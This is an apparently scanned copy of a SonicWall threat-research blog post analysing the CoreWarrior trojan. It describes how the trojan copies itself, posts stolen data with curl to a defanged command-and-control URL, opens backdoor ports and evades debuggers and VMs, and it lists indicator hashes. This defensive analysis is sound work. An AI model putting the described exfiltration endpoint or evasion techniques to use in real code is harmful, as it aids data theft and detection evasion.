blog.sonicwall.com
Open in
urlscan Pro
107.154.76.50
Public Scan
URL:
https://blog.sonicwall.com/en-us/2024/10/corewarrior-spreader-malware-surge/
Submission: On October 16 via api from DE — Scanned from DE
Submission: On October 16 via api from DE — Scanned from DE
Form analysis
1 forms found in the DOMGET https://blog.sonicwall.com/en-us/
<form action="https://blog.sonicwall.com/en-us/" id="searchform" method="get" class="">
<div> <input type="submit" value="" id="searchsubmit" class="button avia-font-entypo-fontello"> <input type="text" id="s" name="s" value="" placeholder="Search"></div>
</form>
Text Content
* Home * Topics * All Posts * Boundless Cybersecurity * BYOD and Mobile Security * Cloud Security * Education * Email Security * Government * Healthcare * Industry News and Events * Network Security * Partners * Retail * Small & Medium Businesses * SonicWall Community * Threat intelligence * Wireless Security * Authors * English * Search * * * * * * * * * * Menu * Facebook * Twitter * Linkedin * Instagram * Mail * Rss COREWARRIOR SPREADER MALWARE SURGE By Security News October 11, 2024 OVERVIEW This week, the SonicWall Capture Labs threat research team investigated a sample of CoreWarrior malware. This is a persistent trojan that attempts to spread rapidly by creating dozens of copies of itself and reaching out to multiple IP addresses, opening multiple sockets for backdoor access, and hooking Windows UI elements for monitoring. INFECTION CYCLE The malware is a UPX-packed executable that has been manually tampered with and will not unpack using the standard UPX unpacker. Figures 1 (top), 2(bottom): Initial detection, and failure due to checksum error On runtime, the executable creates a copy of itself with a randomly generated name. The copy will launch a command prompt and use curl to POST data to “http://wecan.hasthe(dot)technology/upload”. With each subsequent POST that is completed, the parent program will delete the existing copy and create a new copy. During testing, one hundred and seventeen copies were created and deleted in under ten minutes. Figure 3: Malware is connecting to site and posting data As messages are being sent, the program will then bind a listener on ports 49730-49777 and 50334-50679. A secondary IP address of 172.67.183.40 had a single connection made, but no TCP/UDP traffic was sent. Figure 4: Multi-part output of data sent The parent process will obtain information on the system drives, as well as create a hook for the command prompt window to monitor for changes. The malware has several types of anti-analysis capabilities, including: * Anti-debug using rdtsc to check debug times; program will exit if times exceed threshold * Evasion using a randomized sleep timer that changes per number of connection attempts/successes/failures (Figure 4) * VM environment detection, as there are strings to check for HyperV containers Figure 5: Variables used in sleep determinations Other protocols referenced by the code include FTP, SMTP, and POP3 for data exfiltration. SONICWALL PROTECTIONS To ensure SonicWall customers are prepared for any exploitation that may occur due to this malware, the following signatures have been released: * CoreWarrior.A IOCS 85A6E921E4D5107D13C1EB8647B130A1D54BA2B6409118BE7945FD71C6C8235F (packed) 8C97329CF7E48BB1464AC5132B6A02488B5F0358752B71E3135D9D0E4501B48D (unpacked) * * * * * Security News The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks. Categories: Threat intelligence Tags: Security News SHARE THIS ENTRY * Share on Facebook * Share on Twitter * Share on Google+ * Share on Pinterest * Share on Linkedin * Share on Tumblr * Share on Vk * Share on Reddit * Share by Mail https://d3ik27cqx8s5ub.cloudfront.net/blog/media/uploads/sec-news-header-3.png 500 1200 Security News https://blog.sonicwall.com/wp-content/uploads/images/logo/SonicWall_Registered-Small.png Security News2024-10-11 13:01:582024-10-11 13:02:45CoreWarrior Spreader Malware Surge RECOMMENDED CYBER SECURITY STORIES Ranbyus Banking Trojan, Cousin of Zbot Adobe Embedded JBIG2 Stream BO (Feb 27, 2009) Understanding CVE-2024-38063: How SonicWall Prevents Exploitation Ryzerlo ransomware poses as Pokemon game (August 19, 2016) Egregor Ransomware Squid Game themed Android malware hides SpyNote spyware Github hosted Android ransomware being misused in the wild PHP-FPM Vulnerability leads to Remote code execution Connect with an Expert SEARCH FACEBOOK Recent Tags Recent * HORUS Protector Part 2: The New Malware Distribution Se...October 14, 2024 - 10:43 am * CoreWarrior Spreader Malware SurgeOctober 11, 2024 - 1:01 pm * Microsoft Security Bulletin Coverage for October 2024October 9, 2024 - 10:07 am * Fortifying Closed Networks: SonicWall’s Approach to Secure...October 8, 2024 - 8:30 am Tags 802.11AC Advanced Threats Antivirus Awards Capture Cloud Platform Channel Cloud App Security CRN Cyberattack Cyber Security Cybersecurity cyberthreats DDoS Education Email Security Encrypted Attacks Encrypted Threats Endpoint Protection endpoint security Firewall Industry Awards IoT Malware MSSP Network Security news Next-Gen Firewalls next generation firewalls Phishing Ransomware Real-Time Deep Memory Inspection (RTDMI) Resources Resources RSA Conference SecureFirst Partner Program Secure Mobile Access Security Security News SMB SonicWall Capture ATP SonicWall Capture Client SonicWall WiFi Cloud Manager Threat Intelligence Threat Report zero-day ABOUT SONICWALL About Us Leadership Awards News Press Kit Careers Contact Us PRODUCTS Firewalls Advanced Threat Protection Remote Access Email Security SOLUTIONS Advanced Threats Risk Management Industries Managed Security Use Cases Partner Enabled Services CUSTOMERS How To Buy MySonicWall.com Loyalty & Trade-In Programs SUPPORT Knowledge Base Video Tutorials Technical Documentation Partner Enabled Services Support Services CSSA and CSSP Certification Training Contact Support Community © Copyright 2023 SonicWall. All Rights Reserved. * Facebook * Twitter * Linkedin * Instagram * Mail * Rss Microsoft Security Bulletin Coverage for October 2024 HORUS Protector Part 2: The New Malware Distribution Service PIN IT ON PINTEREST Scroll to top